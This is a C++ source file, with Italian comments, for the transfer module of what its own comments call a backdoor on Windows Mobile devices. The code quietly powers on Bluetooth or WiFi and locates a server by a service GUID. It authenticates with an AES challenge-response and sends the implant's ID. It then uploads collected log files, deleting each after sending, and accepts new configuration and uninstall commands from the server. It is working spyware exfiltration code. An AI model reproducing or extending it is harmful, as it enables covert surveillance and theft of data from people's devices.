#include <exception>
using namespace std;

#include "Transfer.h"
#include "Status.h"
#include "Connmgr_status.h"
#include "Connmgr.h"

DEFINE_GUID(HMOBILE_PROTO_UUID, 0xa81fd4e0, 0xeec8, 0x4a1f, 0xbd, 0x6c, 0xb2, 0x49, 0x74, 0x57, 0x6b, 0xb9);
DEFINE_GUID(WIFI_DEVICE_GUID,   0x98c5250d, 0xc29a, 0x4985, 0xae, 0x5f, 0xaf, 0xe5, 0x36, 0x7e, 0x50, 0x06);

BOOL Transfer::InquiryService(WCHAR *address, void *protocolInfo)
{
	WSAQUERYSET querySet;
	GUID protocol;
	BYTE buffer[1000];
	DWORD bufferLength;
	WSAQUERYSET *pResults = (WSAQUERYSET*)&buffer;
	HANDLE handle;
	BTHNS_RESTRICTIONBLOB rb;
	BLOB blob;
	BOOL state;

	ZeroMemory(&blob, sizeof(BLOB));
	ZeroMemory(&rb, sizeof(rb));
	ZeroMemory(&querySet, sizeof(WSAQUERYSET));

	blob.cbSize = sizeof(BTHNS_RESTRICTIONBLOB);
	blob.pBlobData = (BYTE *)&rb;

	protocol = btGuid;

	querySet.dwSize = sizeof(querySet);
	querySet.lpServiceClassId = &protocol;
	querySet.dwNameSpace = NS_BTH;
	querySet.lpszContext = address;
	querySet.lpBlob = &blob;

	rb.type = SDP_SERVICE_SEARCH_REQUEST;
	rb.uuids[0].uuidType = SDP_ST_UUID128;
	rb.uuids[0].u.uuid128 = btGuid;

	if(WSALookupServiceBegin(&querySet, 0, &handle))
		return FALSE;

	bufferLength = sizeof(buffer);

	if(WSALookupServiceNext(handle, LUP_RETURN_BLOB, &bufferLength, pResults))
		state = FALSE;
	else
		state = TRUE;

	WSALookupServiceEnd(handle);
	return state;
}

BT_ADDR Transfer::FindServer(SOCKET bt)
{
	WSAQUERYSET querySet;
	WSAPROTOCOL_INFO protocolInfo;
	DWORD bufferLength;
	WCHAR addressAsString[64];
	HANDLE handle;
	GUID protocol;
	INT proto = sizeof(WSAPROTOCOL_INFO);
	BYTE buffer[1000];
	WSAQUERYSET *pResults = (WSAQUERYSET*)&buffer;
	BT_ADDR btAddr = 0;

	bufferLength = sizeof(buffer);

	ZeroMemory(&querySet, sizeof(querySet));

	querySet.dwSize  = sizeof(querySet);
	querySet.dwNameSpace  = NS_BTH;

	protocol = btGuid;

	if(getsockopt(bt, SOL_SOCKET, SO_PROTOCOL_INFOW, (CHAR *)&protocolInfo, &proto))
		return 0;

	if (WSALookupServiceBegin(&querySet, LUP_CONTAINERS, &handle))
		return 0;

	while (1) {
		if (WSALookupServiceNext(handle, LUP_RETURN_ADDR, &bufferLength, pResults) != 0)
			break;

		wsprintf(addressAsString, L"(%.2X:%.2X:%.2X:%.2X:%.2X:%.2X)", (UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[11],
			(UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[10], (UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[9],
			(UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[8], (UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[7],
			(UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[6]);

		if(InquiryService(addressAsString, &protocolInfo)) {
			memcpy(&btAddr, pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data + 6, 6); 
			break;
		}
	}

	WSALookupServiceEnd(handle);
	return btAddr;
}

BOOL Transfer::ActivateBT() {
	DWORD dwRadioMode = 0;

	BthGetMode(&dwRadioMode);

	if(bIsBtAlreadyActive && dwRadioMode == BTH_POWER_OFF){
		bIsBtAlreadyActive = FALSE;
		bIsBtActive = FALSE;
	}

	switch(dwRadioMode){
		case BTH_CONNECTABLE:
		case BTH_DISCOVERABLE:
			bIsBtAlreadyActive = TRUE;
			break;

		default:
			bIsBtAlreadyActive = FALSE;
			BthSetMode(BTH_CONNECTABLE);
			BthGetMode(&dwRadioMode);
			break;
	}

	if(dwRadioMode == BTH_POWER_OFF)
			return FALSE;

	bIsBtActive = TRUE;
	return bIsBtActive;
}

BOOL Transfer::DeActivateBT() {
	DWORD dwRadioMode = 0;

	BthGetMode(&dwRadioMode);

	if(dwRadioMode == BTH_POWER_OFF){
		bIsBtActive = FALSE;
		return TRUE;
	}

	if(bIsBtAlreadyActive)
		return TRUE;

	BthSetMode(BTH_POWER_OFF);
	BthGetMode(&dwRadioMode);

	if(dwRadioMode != BTH_POWER_OFF){
		bIsBtActive = TRUE;
		return FALSE;
	}

	bIsBtActive = FALSE;
	return TRUE;
}

BOOL Transfer::ActivateWiFi() {
	CEDEVICE_POWER_STATE powerState = PwrDeviceUnspecified;

	if(pWifiAdapter == NULL)
		return FALSE;

	// A questo punto abbiamo in wifiName la GUID ed il nome dell'adattatore,
	// in pBuf il nome dell'adattatore gia' NULL terminato
	if(GetDevicePower(pWifiName, POWER_FORCE, &powerState) != ERROR_SUCCESS) {
		powerState = D4; // In caso di errore, supponiamo che sia spenta
	}

	if(bIsWifiAlreadyActive && powerState == D4){
		bIsWifiAlreadyActive = FALSE;
		bIsWifiActive = FALSE;
	}

	// Conserviamo lo stato, lo utilizzeremo nella DeActivateWifi()
	wifiPower = powerState;

	switch(powerState){
		case D0: // Full on
		case D1: // Low on
			bIsWifiAlreadyActive = TRUE;
			break;

		default:
			bIsWifiAlreadyActive = FALSE;
			SetDevicePower(pWifiName, POWER_NAME, D0);

			if(GetDevicePower(pWifiName, POWER_FORCE, &powerState) != ERROR_SUCCESS) {
				powerState = D4; // In caso di errore, supponiamo che sia spenta
			}
			break;
	}

	if(powerState == D4)
		return FALSE;

	bIsWifiActive = TRUE;
	return bIsWifiActive;
}

BOOL Transfer::DeActivateWiFi() {
	CEDEVICE_POWER_STATE powerState = PwrDeviceUnspecified;

	if(pWifiAdapter == NULL)
		return FALSE;

	if(GetDevicePower(pWifiName, POWER_FORCE, &powerState) != ERROR_SUCCESS) {
		powerState = D4; // In caso di errore, supponiamo che sia spenta
	}

	if(bIsWifiAlreadyActive) {
		// Se necessario restoriamo lo stato di alimentazione originale
		if(powerState != wifiPower) {
			SetDevicePower(pWifiName, POWER_NAME, wifiPower);
		}

		return TRUE;
	}

	if(powerState == D4){
		SetDevicePower(pWifiName, POWER_NAME, D4); // Proviamo comunque a spegnerla
		bIsWifiActive = FALSE;
		return TRUE;
	}

	SetDevicePower(pWifiName, POWER_NAME, D0);

	if(GetDevicePower(pWifiName, POWER_FORCE, &powerState) != ERROR_SUCCESS) {
		powerState = D4; // In caso di errore, supponiamo che sia spenta
	}

	if(powerState != D4){
		bIsWifiActive = TRUE;
		return FALSE;
	}

	bIsWifiActive = FALSE;
	return TRUE;
}

BOOL Transfer::SetBTPin(UCHAR *pPin, UINT uLen) {
	if(pPin == NULL || uLen == 0 || uLen > 16)
		return FALSE;

	ZeroMemory(BtPin, 16);
	memcpy(BtPin, pPin, uLen);
	return TRUE;
}

BOOL Transfer::IsInternetConnectionAvailable() {
	throw "Not yet implemented";
}

void Transfer::MiniSleep(UINT delay) {
	throw "Not yet implemented";
}

UINT Transfer::Send(UINT Type) {
	SOCKET localSocket;
	DWORD dwData, dwRead = 0;
	BYTE *pData = NULL;

	switch(Type){
		case CONF_SYNC_BT:
			localSocket = BTSocket;
			break;
	
		case CONF_SYNC_WIFI:
			localSocket = wifiSocket;
			break;

		case CONF_SYNC_INTERNET:
			localSocket = internetSocket;
			break;

		default: 
			localSocket = INVALID_SOCKET;
			break;
	}

	if(localSocket == INVALID_SOCKET || localSocket == SOCKET_ERROR)
		return FALSE;

	// Primo step del protocollo (CHALLENGE)
	if(SendChallenge(localSocket) == FALSE){
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	// Secondo step, controlliamo il response
	if(CheckResponse(localSocket) == FALSE){
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	if(SendCommand(localSocket, PROTO_OK) == SOCKET_ERROR)
		return FALSE;

	// Terzo step, riceviamo il challenge dal server
	if(GetChallenge(localSocket) == FALSE) {
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	// Attendiamo l'OK dal server
	if(RecvCommand(localSocket) != PROTO_OK)
		return FALSE;

	/* QUI FINISCE LA PARTE DI GESTIONE DEL CHALLENGE RESPONSE */

	// Invio l'id univoco della backdoor
	if(SendCommand(localSocket, PROTO_ID) == SOCKET_ERROR)
		return FALSE;

	if(SendData(localSocket, g_BackdoorID, 16) == SOCKET_ERROR)
		return FALSE;

	// Attendiamo l'OK dal server
	if(RecvCommand(localSocket) != PROTO_OK)
		return FALSE;

	// Invio l'instance id della backdoor
	if(SendCommand(localSocket, PROTO_INSTANCE) == SOCKET_ERROR)
		return FALSE;

	if(SendData(localSocket, g_InstanceId, 20) == SOCKET_ERROR)
		return FALSE;

	// Attendiamo l'OK dal server
	if(RecvCommand(localSocket) != PROTO_OK)
		return FALSE;

	bNewConf = FALSE;
	bUninstall = FALSE;

	/* RICEVIAMO LA NUOVA CONFIGURAZIONE O EVENTUALI COMANDI */
	while(1) {
		if((dwData = RecvCommand(localSocket)) == SOCKET_ERROR) {
			SendCommand(localSocket, PROTO_BYE);
			return FALSE;
		}

		switch(dwData) {
			case PROTO_SYNC: 	/* PARTIAMO CON LA SYNC */
				if(Sync(localSocket) == FALSE){
					SendCommand(localSocket, PROTO_NO);
				}
				break;

			case PROTO_NEW_CONF:
				if(GetNewConf(localSocket) == FALSE){
					SendCommand(localSocket, PROTO_NO);
				} else {
					bNewConf = TRUE;
				}
				break;

			case PROTO_UNINSTALL:
				bUninstall = TRUE;
				SendCommand(localSocket, PROTO_BYE);
				return TRUE;

			case PROTO_BYE:
				SendCommand(localSocket, PROTO_BYE);
				return TRUE;

			case PROTO_DOWNLOAD:
				break;

			case PROTO_UPLOAD:
				break;

			default:
				return FALSE;
		}
	}

	/* SALUTIAMO IL SERVER */
	SendCommand(localSocket, PROTO_BYE);

	return TRUE;
}

BYTE* Transfer::Recv(UINT* len) {
	throw "Not yet implemented";
}

BOOL Transfer::Close(UINT type) {
	throw "Not yet implemented";
}

BOOL Transfer::SendChallenge(SOCKET s) {
	UINT uRand, i;
	Rand r;

	if(s == NULL)
		return FALSE;

	// Generiamo 16 byte casuali
	for(i = 0; i < 16; i += 4) {
		uRand = r.rand32();
		memcpy((BYTE *)&Challenge[i], &uRand, sizeof(uRand));
	}

	// Spediamo il CHALLENGE command
	if(SendCommand(s, PROTO_CHALLENGE) == SOCKET_ERROR)
		return FALSE;

	// E poi spediamo il challenge
	if(SendData(s, Challenge, 16) == SOCKET_ERROR)
		return FALSE;

	return TRUE;
}

BOOL Transfer::CheckResponse(SOCKET s) {
	BYTE Response[16];
	UINT uCommand = 0;
	aes_context ctx;
	BYTE IV[16];

	if(s == NULL)
		return FALSE;

	// Cifriamo il challenge che abbiamo generato
	ZeroMemory(IV, 16);
	aes_set_key(&ctx, (unsigned char *)&g_Challenge, 256);
	aes_cbc_encrypt(&ctx, IV, Challenge, Challenge, 16);

	// Riceviamo il comando di response
	if(RecvCommand(s) != PROTO_RESPONSE)
		return FALSE;

	// Riceviamo il response vero e proprio
	if(RecvData(s, Response, 16) == SOCKET_ERROR)
		return FALSE;

	// Prendiamo i byte, e controlliamo se quelli cifrati dal server
	// sono uguali ai nostri
	if(memcmp(Response, Challenge, sizeof(Challenge)))
		return FALSE;

	return TRUE;
}

BOOL Transfer::GetChallenge(SOCKET s) {
	BYTE uChallenge[16], IV[16];
	UINT uCommand = 0;
	aes_context ctx;

	if(s == NULL)
		return FALSE;

	// Cifriamo il challenge che abbiamo generato
	ZeroMemory(IV, 16);
	aes_set_key(&ctx, (unsigned char *)&g_Challenge, 256);

	// Riceviamo il comando di challenge
	if(RecvCommand(s) != PROTO_CHALLENGE)
		return FALSE;

	// Riceviamo il challenge vero e proprio
	if(RecvData(s, uChallenge, 16) == SOCKET_ERROR)
		return FALSE;

	aes_cbc_encrypt(&ctx, IV, uChallenge, uChallenge, 16);

	// Spediamo il RESPONSE command
	if(SendCommand(s, PROTO_RESPONSE) == SOCKET_ERROR)
		return FALSE;

	// E poi spediamo il response
	if(SendData(s, uChallenge, 16) == SOCKET_ERROR)
		return FALSE;

	return TRUE;
}

BOOL Transfer::Sync(SOCKET s) {
#define SAFE_EXIT(x)	if(pData) \
						delete[] pData; \
						if(hFile != INVALID_HANDLE_VALUE) \
						CloseHandle(hFile); \
						return x;

	BYTE *pData = NULL;
	list<LogInfo>::iterator iter;
	UINT uCommand = 0, logNum, dwSize, dwRead = 0, dwBuf[2];
	HANDLE hFile;

	if(s == NULL)
		return FALSE;

	// Log viene cancellato dal distruttore di Transfer e da Task
	pSnap = log->GetLogSnapshot();

	if(pSnap == NULL)
		return FALSE;

	logNum = pSnap->size();

	// Diciamo al server quanti log stiamo per spedire
	dwBuf[0] = PROTO_LOG_NUM;
	dwBuf[1] = logNum;

	if(SendData(s, (BYTE *)&dwBuf, sizeof(dwBuf)) == SOCKET_ERROR)
		return FALSE;

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	for(iter = pSnap->begin(); iter != pSnap->end(); iter++){
		hFile = CreateFile((*iter).pLog, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE)
			continue;

		dwSize = GetFileSize(hFile, NULL);

		if(dwSize == 0){
			CloseHandle(hFile);
			continue;
		}

		// LOG,# di bytes
		dwBuf[0] = PROTO_LOG;
		dwBuf[1] = dwSize;

		if(SendData(s, (BYTE *)&dwBuf, sizeof(dwBuf)) == SOCKET_ERROR) {
			SAFE_EXIT(FALSE);
		}
		
		// Attendiamo l'OK dal server
		if(RecvCommand(s) != PROTO_OK) {
			SAFE_EXIT(FALSE);
		}

		// Spediamo il log
		pData = new(std::nothrow) BYTE[dwSize];

		if(pData == NULL) {
			SAFE_EXIT(FALSE);
		}

		if(!ReadFile(hFile, pData, dwSize, (DWORD *)&dwRead, NULL)){
			CloseHandle(hFile);
			delete[] pData;
			pData = NULL;
			continue;
		}

		CloseHandle(hFile);

		if(SendData(s, pData, dwRead) == SOCKET_ERROR) {
			SAFE_EXIT(FALSE);
		}

		// Attendiamo l'OK dal server
		if(RecvCommand(s) != PROTO_OK) {
			SAFE_EXIT(FALSE);
		}

		delete[] pData;
		pData = NULL;

		// Rimuoviamo il log
		log->RemoveLog((*iter).pLog);
	}

	return TRUE;
}

BOOL Transfer::SetBTMacAddress(UINT64 uMacAddress) {
	if(uMacAddress == 0)
		return FALSE;

	uBtMac = uMacAddress;

	return TRUE;
}

BOOL Transfer::SetBTGuid(GUID gGuid) {
	btGuid = gGuid;

	return TRUE;
}

BOOL Transfer::SetWifiMacAddress(UINT pMacAddress) {
	throw "Not yet implemented";
}

BOOL Transfer::SetWifiSSID(WCHAR* pSSID) {
	throw "Not yet implemented";
}

BOOL Transfer::SetWifiKey(BYTE* pKey, UINT len, UINT type) {
	throw "Not yet implemented";
}

Transfer::Transfer() : bIsBtActive(FALSE), bIsWifiActive(FALSE), bIsBtAlreadyActive(FALSE), 
bIsWifiAlreadyActive(FALSE), uBtMac(0), retryTimes(0), pollInterval(0), pSnap(NULL), log(NULL),
bNewConf(FALSE), bUninstall(FALSE), wifiObj(NULL), pWifiName(NULL), pWifiAdapter(NULL) {
	WCHAR wifiGuid[]  = L"{98C5250D-C29A-4985-AE5F-AFE5367E5006}\\";
	WCHAR *wOffset = NULL;
	DWORD dwBufLen = 256;
	
	statusObj = Status::self();
	wifiObj = new(std::nothrow) CWifiPeek();

	ZeroMemory(BtPin, sizeof(BtPin));

	btGuid = HMOBILE_PROTO_UUID;

	// Impostiamo un intervallo di default
	SetPollInterval(10000, 5);

	// Otteniamo il nome degli adattori WiFi
	if(wifiObj == NULL)
		return;

	pWifiAdapter = new(std::nothrow) WCHAR[dwBufLen];

	if(pWifiAdapter == NULL)
		return;

	ZeroMemory(pWifiAdapter, dwBufLen * sizeof(WCHAR));

	if(wifiObj->GetAdapters(pWifiAdapter, dwBufLen) == FALSE) {
		delete[] pWifiAdapter;
		pWifiAdapter = NULL;
		pWifiName = NULL;
		return;
	}

	// Le schede WiFi vengono listate separate da una virgola
	// per il momento prendiamo solo il nome del primo adattatore
	wOffset = wcschr(pWifiAdapter, ',');

	if(wOffset) {
		*wOffset = 0;
	}

	pWifiName = new(std::nothrow) WCHAR[wcslen(wifiGuid) + wcslen(pWifiAdapter) + 1];

	if(pWifiName == NULL) { 
		delete[] pWifiAdapter;
		pWifiAdapter = NULL;
		pWifiName = NULL;
		return;		
	}

	ZeroMemory(pWifiName, wcslen(wifiGuid) + wcslen(pWifiAdapter) + sizeof(WCHAR));
	wcscpy_s(pWifiName, wcslen(wifiGuid) + wcslen(pWifiAdapter) + 1, wifiGuid);
	wcscat_s(pWifiName, wcslen(wifiGuid) + wcslen(pWifiAdapter) + 1, pWifiAdapter);

	// A questo punto pWifiAdapter e pWifiname sono valorizzati
}

Transfer::~Transfer() {
	if(wifiObj)
		delete wifiObj;

	if(pWifiAdapter)
		delete[] pWifiAdapter;

	if(pWifiName)
		delete[] pWifiName;

	if(log)
		delete log;
}

INT Transfer::Poll(UINT type) {
	throw "Not yet implemented";
}

UINT Transfer::BtSend() {
	WSADATA wsd;
	list<ConfStruct *> *conf = NULL;
	list<ConfStruct *>::iterator iter;
	SOCKADDR_BTH sab;
	BTH_SOCKOPT_SECURITY bss;
	UINT poll, times, i;
	INT ret;

	if(statusObj == FALSE)
		return FALSE;

	ZeroMemory(&sab, sizeof(SOCKADDR_BTH));
	ZeroMemory(&bss, sizeof(BTH_SOCKOPT_SECURITY));

	WAIT_AND_SIGNAL(statusObj->hConfigLock);
	conf = statusObj->GetConfigStruct();

	if(conf == NULL){
		UNLOCK(statusObj->hConfigLock);
		return FALSE;
	}

	for(iter = conf->begin(); iter != conf->end(); iter++){
		switch((*iter)->uConfId){
			case CONFIGURATION_BTMAC: 
				SetBTMacAddress(*(BT_ADDR *)((*iter)->pParams));
				break;

			case CONFIGURATION_BTPIN:
				SetBTPin((UCHAR *)((*iter)->pParams), (*iter)->uParamLength);
				break;

			case CONFIGURATION_CONNRETRY:
				poll = *(UINT *)((*iter)->pParams);
				times = *(UINT *)((BYTE *)(*iter)->pParams + 4);
				SetPollInterval(poll, times);
				break;

			case CONFIGURATION_BTGUID:
				SetBTGuid(*(GUID *)((*iter)->pParams));
				break;

			default: break;
		}
	}
	UNLOCK(statusObj->hConfigLock);

	if(WSAStartup(MAKEWORD(1,0),&wsd) != 0)
		return FALSE;

	if(ActivateBT() == FALSE){
		WSACleanup();
		return FALSE;
	}

	BTSocket = socket(AF_BTH, SOCK_STREAM, BTHPROTO_RFCOMM);

	if(BTSocket == INVALID_SOCKET){
		DeActivateBT();
		WSACleanup();
		return FALSE;
	}

	// Find loop
	i = 0;
	while(i < retryTimes){
		uBtMac = FindServer(BTSocket);

		if(uBtMac == 0) {
			Sleep(pollInterval);
			i++;
			continue;
		}

		break;
	}

	if(uBtMac == 0) { 
		DeActivateBT();
		WSACleanup();
		return FALSE;
	}

	sab.btAddr = uBtMac;
	sab.addressFamily = AF_BTH;
	sab.port = 0;
	sab.serviceClassId = btGuid;
	bss.btAddr = uBtMac;
	bss.iLength = strlen((CHAR *)BtPin);
	memcpy((CHAR *)bss.caData, (CHAR *)BtPin, strlen((CHAR *)BtPin));

	if(strlen((CHAR *)BtPin)){
		if(setsockopt(BTSocket, SOL_RFCOMM, SO_BTH_SET_PIN , (CHAR *)&bss, sizeof(bss)) == SOCKET_ERROR){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();
			return FALSE;
		}

		INT encryption = TRUE;
		if(setsockopt(BTSocket, SOL_RFCOMM, SO_BTH_ENCRYPT , (CHAR *)&encryption, sizeof(encryption)) == SOCKET_ERROR){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();
			return FALSE;
		}
	}

	// Connect loop
	i = 0;
	while(i < retryTimes){
		ret = connect(BTSocket, (const sockaddr *)&sab, sizeof(sab));

		if(ret) {
			Sleep(pollInterval);
			i++;
			continue;
		}

		break;
	}

	// Non si riesce a connettere, torniamo con un errore
	if (ret) {
		DeActivateBT();
		closesocket(BTSocket);
		WSACleanup();
		return FALSE;
	}

	// Send loop
	i = 0;
	while (i < retryTimes) {
		if(Send(CONF_SYNC_BT) == TRUE){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();

			if(bUninstall)
				return SEND_UNINSTALL;

			if(bNewConf)
				return SEND_RELOAD;

			return TRUE;
		} else {
			Sleep(pollInterval);
			i++;
			continue;
		}
	}

	DeActivateBT();
	closesocket(BTSocket);
	WSACleanup();
	return FALSE;
}

UINT Transfer::WiFiSend() {
	throw "Not yet implemented";
}

UINT Transfer::InternetSend() {
	throw "Not yet implemented";
}

BOOL Transfer::SetPollInterval(UINT uPoll, UINT uTimes) {
	pollInterval = uPoll;
	retryTimes = uTimes;

	if(pollInterval == 0)
		pollInterval = 1000;

	return TRUE;
}

INT Transfer::SendData(SOCKET s, BYTE *pData, UINT Len) {
	INT ret, offset;
	CHAR *tmp = NULL;

	if(s == NULL || s == INVALID_SOCKET || pData == NULL)
		return SOCKET_ERROR;

	if(Len == 0)
		return 0;

	tmp = (CHAR *)pData;
	offset = 0;
	ret = 0;

	while((UINT)ret < Len - offset) {
		ret = send(s, tmp, Len - offset, 0);

		if(ret == SOCKET_ERROR)
			return SOCKET_ERROR;

		if((UINT)ret < Len - offset) {
			tmp += ret;
			offset += ret;
		} 
	}

	return ret;
}

INT Transfer::RecvData(SOCKET s, BYTE *pData, UINT Len) {
	INT ret;
	CHAR *tmp = NULL;
	
	if(s == NULL || s == INVALID_SOCKET || pData == NULL || Len == 0)
		return SOCKET_ERROR;

	ret = recv(s, (CHAR *)pData, Len, 0);

	if(ret == 0){
		return SOCKET_ERROR;
	}

	if(ret == SOCKET_ERROR) {
		ret = WSAGetLastError();

		if(ret == WSAEMSGSIZE)
			return ret;

		return SOCKET_ERROR;
	}

	return ret;
}

INT Transfer::SendCommand(SOCKET s, UINT uCommand) {
	INT ret, offset;
	CHAR *tmp = NULL;

	if(s == NULL || s == INVALID_SOCKET || uCommand == INVALID_COMMAND)
		return SOCKET_ERROR;

	tmp = (CHAR *)&uCommand;
	offset = 0;
	ret = 0;

	while((UINT)ret < sizeof(uCommand) - offset) {
		ret = send(s, tmp, sizeof(uCommand), 0);

		if(ret == SOCKET_ERROR)
			return ret;

		if((UINT)ret < sizeof(uCommand) - offset) {
			tmp += ret;
			offset += ret;
		} 
	}

	return ret;
}

INT Transfer::RecvCommand(SOCKET s) {
	INT ret;
	CHAR *tmp = NULL;
	UINT uData;

	if(s == NULL || s == INVALID_SOCKET)
		return SOCKET_ERROR;

	ret = recv(s, (CHAR *)&uData, sizeof(uData), 0);

	if(ret == 0 || ret == SOCKET_ERROR){
		return SOCKET_ERROR;
	}

	return uData;
}

BOOL Transfer::GetNewConf(SOCKET s) {
	UINT Len;
	BYTE *pNewConf = NULL;

	// Leggiamo la lunghezza del file
	if(RecvData(s, (BYTE *)&Len, sizeof(Len)) == SOCKET_ERROR) {
		return FALSE;
	}

	if(Len == 0)
		return FALSE;

	// Spediamo l'OK al server
	if(SendCommand(s, PROTO_OK) == SOCKET_ERROR)
		return FALSE;

	pNewConf = new(std::nothrow) BYTE[Len];

	if(pNewConf == NULL)
		return FALSE;

	if(RecvData(s, pNewConf, Len) == SOCKET_ERROR) {
		delete[] pNewConf;
		return FALSE;
	}

	// Scriviamo la nuova conf
	Conf *pConf = NULL;
	WCHAR *pBackName = NULL;
	HANDLE hBackup = INVALID_HANDLE_VALUE;	
	DWORD dwWritten = 0;

	pConf = new(std::nothrow) Conf();

	if(pConf == NULL) {
		delete[] pNewConf;
		return FALSE;
	}

	pBackName = pConf->GetBackupName(TRUE);

	delete pConf;

	if(pBackName == NULL) {
		delete[] pNewConf;	
		return FALSE;		
	}

	hBackup = CreateFile(pBackName, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

	delete[] pBackName;

	if(hBackup == INVALID_HANDLE_VALUE) {
		delete[] pNewConf;
		return FALSE;
	}

	if(WriteFile(hBackup, pNewConf, Len, &dwWritten, NULL) == FALSE) {
		WCHAR *p = GetCurrentPath(pBackName);

		CloseHandle(hBackup);
		DeleteFile(p);
		delete[] pNewConf;
		delete[] p;
		return FALSE;
	}

	CloseHandle(hBackup);
	delete[] pNewConf;

	// Spediamo l'OK al server
	if(SendCommand(s, PROTO_OK) == SOCKET_ERROR)
		return FALSE;

	return TRUE;
}